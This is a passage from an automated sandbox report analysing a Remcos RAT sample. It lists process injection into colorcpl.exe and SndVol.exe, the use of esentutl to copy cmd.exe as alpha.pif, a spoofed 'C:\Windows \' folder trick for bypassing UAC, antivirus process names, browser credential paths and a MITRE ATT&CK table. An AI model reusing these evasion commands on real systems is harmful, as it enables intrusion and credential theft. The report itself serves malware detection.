                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06701103 mov eax, dword ptr fs:[00000030h]8_2_06701103
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06701103 mov eax, dword ptr fs:[00000030h]8_2_06701103
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_06744070 mov eax, dword ptr fs:[00000030h]8_2_06744070
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B2C1FA mov eax, dword ptr fs:[00000030h]10_2_00B2C1FA
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00443355 mov eax, dword ptr fs:[00000030h]17_2_00443355
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05121103 mov eax, dword ptr fs:[00000030h]17_2_05121103
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05121103 mov eax, dword ptr fs:[00000030h]17_2_05121103
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05164070 mov eax, dword ptr fs:[00000030h]17_2_05164070
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B0A9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW,5_2_00B0A9D4
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B16EC0 SetUnhandledExceptionFilter,5_2_00B16EC0
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B16B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00B16B40
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0469503C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04694A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_04694A8A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0469BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0469BB71
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04694BD8 SetUnhandledExceptionFilter,8_2_04694BD8
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B16EC0 SetUnhandledExceptionFilter,10_2_00B16EC0
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B16B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00B16B40
                  Source: C:\Users\Public\xpha.pifCode function: 11_2_00D13470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00D13470
                  Source: C:\Users\Public\xpha.pifCode function: 11_2_00D13600 SetUnhandledExceptionFilter,11_2_00D13600
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0043503C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00434A8A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB71
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00434BD8 SetUnhandledExceptionFilter,17_2_00434BD8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0515C88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0515C88C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051557A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_051557A5
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05155D57 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_05155D57
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051558F3 SetUnhandledExceptionFilter,17_2_051558F3

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6700000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 5120000 protect: page execute and read and writeJump to behavior
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6701617Jump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 5121617Jump to behavior
                  Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6700000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 5120000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6700000Jump to behavior
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 5120000Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_04672132
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_00412132
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04679662 mouse_event,8_2_04679662
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: colorcpl.exe, 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: colorcpl.exe, 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04694CB6 cpuid 8_2_04694CB6
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02885ACC
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: GetLocaleInfoA,0_2_0288A7C4
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02885BD8
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: GetLocaleInfoA,0_2_0288A810
                  Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00B08572
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,5_2_00B06854
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00B09310
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_046B24BC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_046A8484
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,8_2_046B25C3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_046B2690
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_046B201B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_046B20B6
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_046B2143
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,8_2_046B2393
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_046B1D58
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,8_2_046B1FD0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,8_2_046A896D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,8_2_0466F90C
                  Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00B08572
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,10_2_00B06854
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00B09310
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02805ACC
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_02805BD7
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFCode function: GetLocaleInfoA,16_2_0280A810
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,17_2_0045201B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,17_2_004520B6
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_00452143
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,17_2_00452393
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,17_2_00448484
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_004524BC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,17_2_004525C3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452690
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,17_2_0044896D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,17_2_0040F90C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_00451D58
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,17_2_00451FD0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,17_2_05130627
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,17_2_05172D36
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,17_2_05172DD1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,17_2_05172CEB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_05172E5E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_05172A73
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,17_2_05169688
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,17_2_0516919F
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_051731D7
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,17_2_051730AE
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_051733AB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,17_2_051732DE
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288920C GetLocalTime,0_2_0288920C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467B69E GetUserNameW,8_2_0467B69E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046A942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,8_2_046A942D
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0288B78C GetVersionExA,0_2_0288B78C
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0466BA4D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0466BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db8_2_0466BB6B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040BB6B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db17_2_0040BB6B

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-SKG82EJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-SKG82E
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe8_2_0466569A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe17_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts                  		2
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  Valid Accounts                  		1
                  Bypass User Account Control                  		1
                  Deobfuscate/Decode Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol111
                  Input Capture                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Valid Accounts                  		2
                  Obfuscated Files or Information                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		1
                  Registry Run Keys / Startup Folder                  		11
                  Access Token Manipulation                  		1
                  Timestomp                  		NTDS1
                  System Network Connections Discovery                  		Distributed Component Object ModelInput Capture1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Windows Service                  		1
                  DLL Side-Loading                  		LSA Secrets2
                  File and Directory Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts422
                  Process Injection                  		1
                  Bypass User Account Control                  		Cached Domain Credentials65
                  System Information Discovery                  		VNCGUI Input Capture213
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Registry Run Keys / Startup Folder                  		1
                  File Deletion                  		DCSync251
                  Security Software Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                  Masquerading                  		Proc Filesystem3
                  Virtualization/Sandbox Evasion                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
